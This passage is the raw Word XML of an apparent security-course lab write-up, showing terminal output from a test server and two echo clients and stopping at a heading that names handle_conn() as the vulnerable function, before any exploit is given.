              <v:shape w14:anchorId="4DF373DA" id="Ink 31" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:318.5pt;margin-top:71.3pt;width:4.65pt;height:6.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">
                <v:imagedata r:id="rId31" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002B2FE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251738112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F96EA07" wp14:editId="0AEB2ECB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4018980</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>921930</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="15840" cy="73440"/>
                <wp:effectExtent l="38100" t="38100" r="41910" b="41275"/>
                <wp:wrapNone/>
                <wp:docPr id="28" name="Ink 28"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId32">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="15840" cy="73440"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7D48A7AE" id="Ink 28" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:315.75pt;margin-top:71.9pt;width:2.7pt;height:7.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">
                <v:imagedata r:id="rId33" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002B2FE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251737088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0B8C1F47" wp14:editId="55463036">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3843655</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>885190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="129900" cy="124460"/>
                <wp:effectExtent l="38100" t="38100" r="41910" b="46990"/>
                <wp:wrapNone/>
                <wp:docPr id="15" name="Ink 15"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId34">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="129900" cy="124460"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="161EEC0C" id="Ink 15" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:301.95pt;margin-top:69pt;width:11.65pt;height:11.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">
                <v:imagedata r:id="rId35" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002B2FE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251734016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="010B82C8" wp14:editId="52D954FE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3607860</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>977370</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="187920" cy="268560"/>
                <wp:effectExtent l="38100" t="57150" r="41275" b="55880"/>
                <wp:wrapNone/>
                <wp:docPr id="12" name="Ink 12"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId36">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="187920" cy="268560"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="62DFC415" id="Ink 12" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:283.4pt;margin-top:76.25pt;width:16.25pt;height:22.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">
                <v:imagedata r:id="rId37" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00155A90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251732992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32C8F7FC" wp14:editId="68CC0B37">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1523820</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>217050</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="360" cy="97200"/>
                <wp:effectExtent l="38100" t="38100" r="57150" b="55245"/>
                <wp:wrapNone/>
                <wp:docPr id="10" name="Ink 10"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId38">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="360" cy="97200"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4710AAD1" id="Ink 10" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:119.3pt;margin-top:16.4pt;width:1.45pt;height:9.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">
                <v:imagedata r:id="rId39" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00351C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73675BAC" wp14:editId="197C27C1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>172928</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2713535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2558160" cy="45000"/>
                <wp:effectExtent l="38100" t="57150" r="33020" b="50800"/>
                <wp:wrapNone/>
                <wp:docPr id="45" name="Ink 45"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId40">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2558160" cy="45000"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shapetype w14:anchorId="3FF278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2.9pt;margin-top:212.95pt;width:202.85pt;height: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">
                <v:imagedata r:id="rId41" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005828D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251688960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F8E8C32" wp14:editId="3639A58A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>217208</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1481690</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2707200" cy="37800"/>
                <wp:effectExtent l="57150" t="38100" r="55245" b="57785"/>
                <wp:wrapNone/>
                <wp:docPr id="44" name="Ink 44"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId42">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2707200" cy="37800"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1AF8B8C5" id="Ink 44" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:16.4pt;margin-top:115.95pt;width:214.55pt;height:4.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">
                <v:imagedata r:id="rId43" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007B6CEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E440279" wp14:editId="1AA60B37">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3545370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1259610</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="165600" cy="181080"/>
                <wp:effectExtent l="57150" t="38100" r="25400" b="47625"/>
                <wp:wrapNone/>
                <wp:docPr id="19" name="Ink 19"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId44">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="165600" cy="181080"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="126E94AA" id="Ink 19" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:278.45pt;margin-top:98.5pt;width:14.5pt;height:1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">
                <v:imagedata r:id="rId45" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007B6CEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="31F28080" wp14:editId="061CE936">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4457610</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1378770</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1313280" cy="4320"/>
                <wp:effectExtent l="38100" t="57150" r="58420" b="53340"/>
                <wp:wrapNone/>
                <wp:docPr id="9" name="Ink 9"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId46">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1313280" cy="4320"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7C5597F8" id="Ink 9" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:350.3pt;margin-top:107.85pt;width:104.8pt;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">
                <v:imagedata r:id="rId47" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:commentRangeStart w:id="2"/>
      <w:r w:rsidR="0040431C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CAC41FC" wp14:editId="1D5428A6">
            <wp:extent cx="5941323" cy="343322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5907" cy="3447428"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:commentRangeEnd w:id="2"/>
      <w:r w:rsidR="00301E46">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="2"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF2C1AD" w14:textId="56E8F906" w:rsidR="00853A5B" w:rsidRDefault="00853A5B" w:rsidP="002808A1">
      <w:r w:rsidRPr="00853A5B">
        <w:t>To test the programs</w:t>
      </w:r>
      <w:r w:rsidR="00BD1E9A">
        <w:t xml:space="preserve"> without dealing with firewall issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00853A5B">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00BD1E9A">
        <w:t>let us</w:t>
      </w:r>
      <w:r w:rsidRPr="00853A5B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00861B2E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidR="006701AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">both </w:t>
      </w:r>
      <w:r w:rsidRPr="00861B2E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r w:rsidR="006701AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">and client </w:t>
      </w:r>
      <w:r w:rsidRPr="00861B2E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidR="006C4D18">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>184.171.124.101</w:t>
      </w:r>
      <w:r w:rsidRPr="00861B2E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="006701AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(jaguar)</w:t>
      </w:r>
      <w:r w:rsidRPr="00861B2E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218B5F79" w14:textId="408AA4B1" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="00267B7C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DF36A6B" wp14:editId="301D58BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-41910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>249555</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3710940" cy="1783080"/>
                <wp:effectExtent l="0" t="0" r="22860" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="17" name="Rectangle 17"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3710940" cy="17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C589" id="Rectangle 17" o:spid="_x0000_s1026" style="position:absolute;margin-left:-3.3pt;margin-top:19.65pt;width:292.2pt;height:14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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00200E5A">
        <w:t>server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8FA051" w14:textId="67D74CB3" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="00267B7C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yingjiul@jaguar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:~/cis436/w6$ server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04060F08" w14:textId="39A13700" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="00267B7C">
      <w:r>
        <w:t>server is ready...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777B63F2" w14:textId="44C1626D" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="00267B7C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>handle_conn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53B6240A" w14:textId="3F1C24C2" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="00267B7C">
      <w:r>
        <w:t>receive data address is in range: 0xf772c000-0xf772d000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D91677B" w14:textId="4FD7C782" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="00267B7C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>handle_conn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E3B96FA" w14:textId="1FC57A3F" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="00267B7C">
      <w:r>
        <w:t>receive data address is in range: 0xf772c000-0xf772d000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35946EFB" w14:textId="77777777" w:rsidR="00200E5A" w:rsidRDefault="00200E5A" w:rsidP="002808A1"/>
    <w:p w14:paraId="703E5D1B" w14:textId="234314AF" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="002808A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09CF87E0" wp14:editId="1DD21203">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-45720</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>223520</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3722370" cy="895350"/>
                <wp:effectExtent l="0" t="0" r="11430" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="29" name="Rectangle 29"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3722370" cy="89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75844" id="Rectangle 29" o:spid="_x0000_s1026" style="position:absolute;margin-left:-3.6pt;margin-top:17.6pt;width:293.1pt;height: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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00200E5A">
        <w:t>client-1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FF4A5C" w14:textId="23D1A2C9" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="00267B7C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yingjiul@jaguar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:~/cis436/w6$ client </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>senddatatoserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7AD48EA0" w14:textId="28A78E0D" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="00267B7C">
      <w:r>
        <w:t>okay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAC4182" w14:textId="2EB5AF91" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="00267B7C">
      <w:r>
        <w:t>SENDDATATOSERVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611D2DE7" w14:textId="70E24278" w:rsidR="00200E5A" w:rsidRDefault="00200E5A" w:rsidP="00267B7C"/>
    <w:p w14:paraId="331CE071" w14:textId="75DB29C9" w:rsidR="00200E5A" w:rsidRDefault="00200E5A" w:rsidP="00267B7C"/>
    <w:p w14:paraId="73DF02F2" w14:textId="77777777" w:rsidR="00200E5A" w:rsidRDefault="00200E5A" w:rsidP="00267B7C"/>
    <w:p w14:paraId="5AEF3720" w14:textId="69BDB5AE" w:rsidR="00267B7C" w:rsidRDefault="00200E5A" w:rsidP="00267B7C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251725824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E95B270" wp14:editId="750271DD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-38100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>227965</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3722370" cy="8953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3722370" cy="89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7878" id="Rectangle 30" o:spid="_x0000_s1026" style="position:absolute;margin-left:-3pt;margin-top:17.95pt;width:293.1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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>client-2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1463A02C" w14:textId="77777777" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="00267B7C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yingjiul@jaguar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:~/cis436/w6$ client </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iamhereaswell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D046E02" w14:textId="77777777" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="00267B7C">
      <w:r>
        <w:t>okay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BD838B" w14:textId="3DFD1B24" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="00267B7C">
      <w:r>
        <w:t>IAMHEREASWELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166CD6BF" w14:textId="77777777" w:rsidR="00267B7C" w:rsidRDefault="00267B7C" w:rsidP="002808A1"/>
    <w:p w14:paraId="458F8914" w14:textId="77777777" w:rsidR="00853A5B" w:rsidRDefault="00853A5B" w:rsidP="00853A5B">
      <w:r>
        <w:t xml:space="preserve">3. Vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E3D7C4" w14:textId="0357F924" w:rsidR="0040431C" w:rsidRDefault="00853A5B" w:rsidP="00853A5B">
      <w:r>
        <w:t xml:space="preserve">The vulnerable part of this program exists in function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B12D8E">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>handle_conn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055060A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B7FA17" w14:textId="4C11440C" w:rsidR="0040431C" w:rsidRDefault="00485EAB" w:rsidP="002808A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D6C6E94" wp14:editId="20D94BB4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2866410</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>387300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1397160" cy="389880"/>
                <wp:effectExtent l="38100" t="57150" r="50800" b="48895"/>
                <wp:wrapNone/>
                <wp:docPr id="22" name="Ink 22"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId49">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1397160" cy="389880"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="34650BA9" id="Ink 22" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:225pt;margin-top:29.8pt;width:111.4pt;height:32.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">
                <v:imagedata r:id="rId50" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B8B207F" wp14:editId="14B04200">
                <wp:simplePos x="0" y="0"/>
